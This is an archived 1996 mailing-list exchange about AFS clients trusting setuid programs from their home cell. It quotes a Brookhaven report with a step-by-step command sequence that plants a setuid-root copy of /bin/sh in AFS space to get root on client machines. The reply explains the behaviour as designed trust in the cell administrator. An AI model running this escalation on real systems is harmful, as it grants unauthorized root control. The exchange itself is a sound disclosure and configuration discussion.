Whether clients trust SUID programs from AFS depends largely on the client.
By default, AFS clients trust the suid bit for any program located within
their primary cell. This can be disabled. (See fs_setcell(1) man page.)
The philosophy is that all clients in the company should trust the cell's
AFS administrator's. If that is not true then clients will have to change
the default (perhaps in the afs startup script.)
-- Garrett D'Amore.
On Thu, 10 Oct 1996 12:08:24 -0400 Tom Nguyen wrote:
> Hi all,
>
> At Brookhaven National lab, we just found something very interseting.
> That is if you know AFS admin password, you can become root on any
> AFS client machines in the cell (except Solaris machines). We did the followi
ng tests
> on AIX, SGI, HPUX and we succeded. Solaris somehow is smart enough to stop th
e
> break-in.
>
> login as user on any AFS client machine belong to your cell
> % klog admin
> % cd /afs/<your-cell>
> % cp /bin/sh .
> % chown root sh
> % chmod 4755 sh
> % ./sh
> % whoami
> root
>
> In other words, If I am AFS administrator, I can be root on any AFS client ma
chines
> belong to my cell. Is it cool ?
>
> Tom Nguyen
>
